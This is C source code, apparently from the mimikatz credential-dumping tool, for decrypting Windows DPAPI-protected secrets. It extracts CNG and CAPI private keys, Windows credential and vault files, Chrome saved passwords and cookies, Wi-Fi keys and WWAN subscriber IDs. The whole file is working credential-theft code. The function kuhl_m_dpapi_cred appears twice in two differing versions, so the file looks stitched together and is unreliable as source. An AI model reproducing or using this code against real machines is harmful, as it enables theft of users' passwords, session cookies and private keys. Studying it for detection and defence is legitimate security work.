NTSTATUS kuhl_m_dpapi_keys_cng(int argc, wchar_t * argv[])
{
PBYTE file;
PVOID out;
DWORD szFile, outLen, cbProperties;
PKULL_M_KEY_CNG_BLOB cngKey;
PKULL_M_KEY_CNG_PROPERTY * properties;
LPCWSTR infile;
PWSTR name;
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile))
{
if(cngKey = kull_m_key_cng_create(file))
{
kull_m_key_cng_descr(0, cngKey);
if(kuhl_m_dpapi_unprotect_raw_or_blob(cngKey->pPrivateProperties, cngKey->dwPrivatePropertiesLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CNG_KEY_PROPERTIES, sizeof(KIWI_DPAPI_ENTROPY_CNG_KEY_PROPERTIES), &out, &outLen, L"Decrypting Private Properties:\n"))
{
if(kull_m_key_cng_properties_create(out, outLen, &properties, &cbProperties))
{
kull_m_key_cng_properties_descr(0, properties, cbProperties);
kull_m_key_cng_properties_delete(properties, cbProperties);
}
LocalFree(out);
}
if(kuhl_m_dpapi_unprotect_raw_or_blob(cngKey->pPrivateKey, cngKey->dwPrivateKeyLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CNG_KEY_BLOB, sizeof(KIWI_DPAPI_ENTROPY_CNG_KEY_BLOB), &out, &outLen, L"Decrypting Private Key:\n"))
{
kull_m_string_wprintf_hex(out, outLen, 0);kprintf(L"\n");
if(name = (PWSTR) LocalAlloc(LPTR, cngKey->dwNameLen + sizeof(wchar_t)))
{
RtlCopyMemory(name, cngKey->pName, cngKey->dwNameLen);
kuhl_m_crypto_exportRawKeyToFile(out, outLen, TRUE, L"raw", 0, name, TRUE, TRUE);
LocalFree(name);
}
LocalFree(out);
}
kull_m_key_cng_delete(cngKey);
}
LocalFree(file);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
else PRINT_ERROR(L"Input CNG private key file needed (/in:file)\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_cred(int argc, wchar_t * argv[])
{
PCWSTR infile;
PVOID file, out;
DWORD szFile, szOut;
PKULL_M_CRED_BLOB cred;
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile))
{
kull_m_dpapi_blob_quick_descr(0, ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blob);
if(kuhl_m_dpapi_unprotect_raw_or_blob(((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blob, ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blobSize, NULL, argc, argv, NULL, 0, &out, &szOut, L"Decrypting Credential:\n"))
{
if(cred = kull_m_cred_create(out))
{
kull_m_cred_descr(0, cred);
kull_m_cred_delete(cred);
}
LocalFree(out);
}
LocalFree(file);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
else PRINT_ERROR(L"Input CRED file needed (/in:file)\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_wwan(int argc, wchar_t * argv[])
{
PBYTE pFile, hex, dataOut;
DWORD dwData, lenHex, lenDataOut;
LPWSTR dataU, dataF;
LPCWSTR infile;
PKULL_M_DPAPI_BLOB blob;
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(kull_m_file_readData(infile, &pFile, &dwData))
{
if(dataU = kull_m_string_qad_ansi_to_unicode((const char *) pFile))
{
if(kull_m_string_quickxml_simplefind(dataU, L"Name", &dataF))
{
kprintf(L"Profile \'%s\'\n\n", dataF);
LocalFree(dataF);
}
if(kull_m_string_quickxml_simplefind(dataU, L"AccessString", &dataF))
{
kprintf(L" * AccessString : %s\n", dataF);
LocalFree(dataF);
}
if(kull_m_string_quickxml_simplefind(dataU, L"SubscriberID", &dataF))
{
if(kull_m_string_stringToHexBuffer(dataF, &hex, &lenHex))
{
if(blob = kull_m_dpapi_blob_create(hex))
{
kprintf(L"\n");
kull_m_dpapi_blob_descr(0, blob);
if(kuhl_m_dpapi_unprotect_raw_or_blob(hex, lenHex, NULL, argc, argv, NULL, 0, (LPVOID *) &dataOut, &lenDataOut, NULL))
{
kprintf(L" * SubscriberID : ");
kull_m_string_wprintf_hex(dataOut, lenDataOut, 0);
kprintf(L"\n");
kprintf(L"%.*s", lenDataOut / sizeof(wchar_t), dataOut);
LocalFree(dataOut);
}
kull_m_dpapi_blob_delete(blob);
}
LocalFree(hex);
}
LocalFree(dataF);
}
LocalFree(dataU);
}
LocalFree(pFile);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
else PRINT_ERROR(L"Input Wwan XML profile needed (/in:file)\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_cred(int argc, wchar_t * argv[])
{
PCWSTR infile;
PVOID file, out;
DWORD szFile, szOut;
BOOL isNT5Cred;
PKULL_M_CRED_BLOB cred;
PKULL_M_CRED_LEGACY_CREDS_BLOB legacyCreds;
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile))
{
isNT5Cred = RtlEqualGuid((PBYTE) file + sizeof(DWORD), &KULL_M_DPAPI_GUID_PROVIDER);
kull_m_dpapi_blob_quick_descr(0, isNT5Cred ? file : ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blob);
if(kuhl_m_dpapi_unprotect_raw_or_blob(isNT5Cred ? file : ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blob, isNT5Cred ? szFile : ((PKUHL_M_DPAPI_ENCRYPTED_CRED) file)->blobSize, NULL, argc, argv, NULL, 0, &out, &szOut, isNT5Cred ? L"Decrypting Legacy Credential(s):\n" : L"Decrypting Credential:\n"))
{
if(isNT5Cred)
{
if(legacyCreds = kull_m_cred_legacy_creds_create(out))
{
kull_m_cred_legacy_creds_descr(0, legacyCreds);
kull_m_cred_legacy_creds_delete(legacyCreds);
}
}
else
{
if(cred = kull_m_cred_create(out))
{
kull_m_cred_descr(0, cred);
kull_m_cred_delete(cred);
}
}
LocalFree(out);
}
LocalFree(file);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
else PRINT_ERROR(L"Input CRED file needed (/in:file)\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_vault(int argc, wchar_t * argv[])
{
PCWSTR inFilePolicy, inFileCred;
PVOID filePolicy, fileCred, out;
DWORD szFilePolicy, szFileCred, szOut, len, i, mode = CRYPT_MODE_CBC;
BYTE aes128[AES_128_KEY_SIZE], aes256[AES_256_KEY_SIZE];
PKULL_M_CRED_VAULT_POLICY vaultPolicy;
PKULL_M_CRED_VAULT_CREDENTIAL vaultCredential;
PKULL_M_CRED_VAULT_CREDENTIAL_ATTRIBUTE attribute;
PKULL_M_CRED_VAULT_CLEAR clear;
PVOID buffer;
BOOL isAttr;
HCRYPTPROV hProv;
HCRYPTKEY hKey;
if(kull_m_string_args_byName(argc, argv, L"cred", &inFileCred, NULL))
{
if(kull_m_file_readData(inFileCred, (PBYTE *) &fileCred, &szFileCred))
{
if(vaultCredential = kull_m_cred_vault_credential_create(fileCred))
{
kull_m_cred_vault_credential_descr(0, vaultCredential);
if(kull_m_string_args_byName(argc, argv, L"policy", &inFilePolicy, NULL))
{
if(kull_m_file_readData(inFilePolicy, (PBYTE *) &filePolicy, &szFilePolicy))
{
if(vaultPolicy = kull_m_cred_vault_policy_create(filePolicy))
{
kull_m_cred_vault_policy_descr(0, vaultPolicy);
if(kuhl_m_dpapi_unprotect_raw_or_blob(vaultPolicy->key->KeyBlob, vaultPolicy->key->dwKeyBlob, NULL, argc, argv, NULL, 0, &out, &szOut, L"Decrypting Policy Keys:\n"))
{
if(kull_m_cred_vault_policy_key(out, szOut, aes128, aes256))
{
kprintf(L" AES128 key: "); kull_m_string_wprintf_hex(aes128, AES_128_KEY_SIZE, 0); kprintf(L"\n");
kprintf(L" AES256 key: "); kull_m_string_wprintf_hex(aes256, AES_256_KEY_SIZE, 0); kprintf(L"\n\n");
if(CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT))
{
for(i = 0; i < vaultCredential->__cbElements; i++)
{
if(attribute = vaultCredential->attributes[i])
{
kprintf(L" > Attribute %u : ", attribute->id);
if(attribute->data && (len = attribute->szData))
{
if(buffer = LocalAlloc(LPTR, len))
{
RtlCopyMemory(buffer, attribute->data, len);
if(kuhl_m_dpapi_vault_key_type(attribute, hProv, aes128, aes256, &hKey, &isAttr))
{
if(CryptDecrypt(hKey, 0, TRUE, 0, (PBYTE) buffer, &len))
{
if(isAttr)
{
kull_m_string_wprintf_hex(buffer, len, 0);
}
else
{
kprintf(L"\n");
if(!attribute->id || (attribute->id == 100))
{
if(clear = kull_m_cred_vault_clear_create(buffer))
{
kull_m_cred_vault_clear_descr(1, clear);
kull_m_cred_vault_clear_delete(clear);
}
}
else kull_m_string_wprintf_hex(buffer, len, 1 | (16 << 16));
kprintf(L"\n");
}
}
else PRINT_ERROR_AUTO(L"CryptDecrypt");
}
LocalFree(buffer);
}
}
kprintf(L"\n");
}
}
CryptReleaseContext(hProv, 0);
}
}
LocalFree(out);
}
kull_m_cred_vault_policy_delete(vaultPolicy);
}
LocalFree(filePolicy);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData (policy)");
}
kull_m_cred_vault_credential_delete(vaultCredential);
}
LocalFree(fileCred);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData (cred)");
}
else PRINT_ERROR(L"Input Cred file needed (/cred:file)\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_chrome(int argc, wchar_t * argv[])
{
PCWSTR infile;
PSTR aInfile;
int rc;
sqlite3 *pDb;
sqlite3_stmt * pStmt;
LPVOID pDataOut;
DWORD dwDataOutLen;
__int64 i64;
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(aInfile = kull_m_string_unicode_to_ansi(infile))
{
rc = sqlite3_initialize();
if(rc == SQLITE_OK)
{
rc = sqlite3_open_v2(aInfile, &pDb, SQLITE_OPEN_READONLY, NULL);
if(rc == SQLITE_OK)
{
if(kuhl_m_dpapi_chrome_isTableExist(pDb, "logins"))
{
rc = sqlite3_prepare_v2(pDb, "select signon_realm, origin_url, username_value, password_value from logins", -1, &pStmt, NULL);
if(rc == SQLITE_OK)
{
while(rc = sqlite3_step(pStmt), rc == SQLITE_ROW)
{
kprintf(L"\nURL : %.*S ( %.*S )\nUsername: %.*S\n",
sqlite3_column_bytes(pStmt, 0), sqlite3_column_text(pStmt, 0),
sqlite3_column_bytes(pStmt, 1), sqlite3_column_text(pStmt, 1),
sqlite3_column_bytes(pStmt, 2), sqlite3_column_text(pStmt, 2));
if(kuhl_m_dpapi_unprotect_raw_or_blob(sqlite3_column_blob(pStmt, 3), sqlite3_column_bytes(pStmt, 3), NULL, argc, argv, NULL, 0, &pDataOut, &dwDataOutLen, NULL))
{
kprintf(L"Password: %.*S\n", dwDataOutLen, pDataOut);
LocalFree(pDataOut);
}
}
if(rc != SQLITE_DONE)
PRINT_ERROR(L"sqlite3_step: %S\n", sqlite3_errmsg(pDb));
}
else PRINT_ERROR(L"sqlite3_prepare_v2: %S\n", sqlite3_errmsg(pDb));
sqlite3_finalize(pStmt);
}
else if(kuhl_m_dpapi_chrome_isTableExist(pDb, "cookies"))
{
rc = sqlite3_prepare_v2(pDb, "select host_key, path, name, creation_utc, expires_utc, encrypted_value from cookies order by host_key, path, name", -1, &pStmt, NULL);
if(rc == SQLITE_OK)
{
while(rc = sqlite3_step(pStmt), rc == SQLITE_ROW)
{
kprintf(L"\nHost : %.*S ( %.*S )\nName : %.*S\nDates : ",
sqlite3_column_bytes(pStmt, 0), sqlite3_column_text(pStmt, 0),
sqlite3_column_bytes(pStmt, 1), sqlite3_column_text(pStmt, 1),
sqlite3_column_bytes(pStmt, 2), sqlite3_column_text(pStmt, 2));
i64 = sqlite3_column_int64(pStmt, 3) * 10;
kull_m_string_displayLocalFileTime((LPFILETIME) &i64);
i64 = sqlite3_column_int64(pStmt, 4) * 10;
if(i64)
{
kprintf(L" -> ");
kull_m_string_displayLocalFileTime((LPFILETIME) &i64);
}
kprintf(L"\n");
if(kuhl_m_dpapi_unprotect_raw_or_blob(sqlite3_column_blob(pStmt, 5), sqlite3_column_bytes(pStmt, 5), NULL, argc, argv, NULL, 0, &pDataOut, &dwDataOutLen, NULL))
{
kprintf(L"Cookie: %.*S\n", dwDataOutLen, pDataOut);
LocalFree(pDataOut);
}
}
if(rc != SQLITE_DONE)
PRINT_ERROR(L"sqlite3_step: %S\n", sqlite3_errmsg(pDb));
}
else PRINT_ERROR(L"sqlite3_prepare_v2: %S\n", sqlite3_errmsg(pDb));
sqlite3_finalize(pStmt);
}
else PRINT_ERROR(L"Neither the table \'logins\' or the table \'cookies\' exist!\n");
}
else PRINT_ERROR(L"sqlite3_open_v2: %S (%S)\n", sqlite3_errmsg(pDb), aInfile);
rc = sqlite3_close_v2(pDb);
rc = sqlite3_shutdown();
}
else PRINT_ERROR(L"sqlite3_initialize: 0x%08x\n", rc);
LocalFree(aInfile);
}
}
else PRINT_ERROR(L"Input \'Login Data\' file needed (/in:\"%%localappdata%%\\Google\\Chrome\\User Data\\Default\\Login Data\")\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_wifi(int argc, wchar_t * argv[])
{
PBYTE pFile, hex, dataOut;
DWORD dwData, lenHex, lenDataOut;
LPWSTR dataU, dataSSID, dataF, dataAuth;
LPCWSTR infile;
PKULL_M_DPAPI_BLOB blob;
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(kull_m_file_readData(infile, &pFile, &dwData))
{
if(dataU = kull_m_string_qad_ansi_to_unicode((const char *) pFile))
{
if(kull_m_string_quickxml_simplefind(dataU, L"name", &dataF))
{
kprintf(L"Profile \'%s\'\n\n", dataF);
LocalFree(dataF);
}
if(kull_m_string_quickxml_simplefind(dataU, L"SSID", &dataSSID))
{
kprintf(L" * SSID ");
if(kull_m_string_quickxml_simplefind(dataSSID, L"name", &dataF))
{
kprintf(L"name : %s\n", dataF);
LocalFree(dataF);
}
else if(kull_m_string_quickxml_simplefind(dataSSID, L"hex", &dataF))
{
kprintf(L"hex : %s\n", dataF);
LocalFree(dataF);
}
else kprintf(L"?\n");
LocalFree(dataSSID);
}
if(kull_m_string_quickxml_simplefind(dataU, L"authentication", &dataAuth))
{
kprintf(L" * Authentication: %s\n", dataAuth);
if(kull_m_string_quickxml_simplefind(dataU, L"encryption", &dataF))
{
kprintf(L" * Encryption : %s\n", dataF);
LocalFree(dataF);
}
if(kull_m_string_quickxml_simplefind(dataU, L"keyMaterial", &dataF))
{
if(kull_m_string_stringToHexBuffer(dataF, &hex, &lenHex))
{
if(blob = kull_m_dpapi_blob_create(hex))
{
kprintf(L"\n");
kull_m_dpapi_blob_descr(0, blob);
if(kuhl_m_dpapi_unprotect_raw_or_blob(hex, lenHex, NULL, argc, argv, NULL, 0, (LPVOID *) &dataOut, &lenDataOut, NULL))
{
kprintf(L" * Key Material : ");
if(_wcsicmp(dataAuth, L"WEP") == 0)
{
kprintf(L"(hex) ");
kull_m_string_wprintf_hex(dataOut, lenDataOut, 0);
}
else
kprintf(L"%.*S", lenDataOut, dataOut);
kprintf(L"\n");
LocalFree(dataOut);
}
kull_m_dpapi_blob_delete(blob);
}
LocalFree(hex);
}
LocalFree(dataF);
}
LocalFree(dataAuth);
}
LocalFree(dataU);
}
LocalFree(pFile);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
else PRINT_ERROR(L"Input Wlan XML profile needed (/in:file)\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_dpapi_keys_capi(int argc, wchar_t * argv[])
{
PVOID file, out;
PRSA_GENERICKEY_BLOB blob;
DWORD szFile, outLen, szBlob;
PKULL_M_KEY_CAPI_BLOB capiKey;
LPCWSTR infile;
PWSTR name;
if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
{
if(kull_m_file_readData(infile, (PBYTE *) &file, &szFile))
{
if(capiKey = kull_m_key_capi_create(file))
{
kull_m_key_capi_descr(0, capiKey);
if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pSiExportFlag, capiKey->dwSiExportFlagLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS, sizeof(KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS), &out, &outLen, L"Decrypting AT_SIGNATURE Export flags:\n"))
{
kull_m_string_wprintf_hex(out, outLen, 0); kprintf(L"\n");
LocalFree(out);
}
if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pSiPrivateKey, capiKey->dwSiPrivateKeyLen, NULL, argc, argv, NULL, 0, &out, &outLen, L"Decrypting AT_SIGNATURE Private Key:\n"))
{
kull_m_string_wprintf_hex(out, outLen, 0); kprintf(L"\n");
if(kull_m_key_capi_decryptedkey_to_raw(out, outLen, &blob, &szBlob))
{
if(name = kull_m_string_qad_ansi_to_unicode(capiKey->pName))
{
kuhl_m_crypto_exportRawKeyToFile(blob, szBlob, FALSE, L"raw_signature", 0, name, TRUE, TRUE);
LocalFree(name);
}
LocalFree(blob);
}
LocalFree(out);
}
if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pExExportFlag, capiKey->dwExExportFlagLen, NULL, argc, argv, KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS, sizeof(KIWI_DPAPI_ENTROPY_CAPI_KEY_EXPORTFLAGS), &out, &outLen, L"Decrypting AT_EXCHANGE Export flags:\n"))
{
kull_m_string_wprintf_hex(out, outLen, 0); kprintf(L"\n");
LocalFree(out);
}
if(kuhl_m_dpapi_unprotect_raw_or_blob(capiKey->pExPrivateKey, capiKey->dwExPrivateKeyLen, NULL, argc, argv, NULL, 0, &out, &outLen, L"Decrypting AT_EXCHANGE Private Key:\n"))
{
kull_m_string_wprintf_hex(out, outLen, 0); kprintf(L"\n");
if(kull_m_key_capi_decryptedkey_to_raw(out, outLen, &blob, &szBlob))
{
if(name = kull_m_string_qad_ansi_to_unicode(capiKey->pName))
{
kuhl_m_crypto_exportRawKeyToFile(blob, szBlob, FALSE, L"raw_exchange", 0, name, TRUE, TRUE);
LocalFree(name);
}
LocalFree(blob);
}
LocalFree(out);
}
kull_m_key_capi_delete(capiKey);
}
LocalFree(file);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
else PRINT_ERROR(L"Input CAPI private key file needed (/in:file)\n");
return STATUS_SUCCESS;
}
